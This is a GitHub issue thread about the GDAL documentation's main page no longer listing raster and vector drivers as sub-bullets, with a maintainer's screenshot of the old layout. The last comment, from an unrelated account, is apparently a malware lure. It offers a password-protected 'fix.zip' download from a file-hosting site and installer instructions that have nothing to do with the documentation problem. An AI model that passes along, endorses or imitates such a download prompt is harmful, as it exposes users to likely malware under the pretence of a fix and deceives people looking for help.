### ISSUE TITLE
Doc: list of drivers no longer in main page

### ISSUE THREAD

**Issue by rouault** [OSGeo/gdal#10666]
@dbaston I believe some of your changes to remove hacks have caused the list of drivers to no longer appear in the main frame of https://gdal.org/en/latest/# as sub-bullet items under the "Raster drivers" and "Vector drivers" bullets. I found it slightly better to have them listed there so you could directly Ctrl+F "TIFF" and find the driver page.

**Comment by rouault** [comment]
This looked like this:

![image](https://github.com/user-attachments/assets/1c9417dc-2e55-4d25-a08e-fdb6e9ee61e6)

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
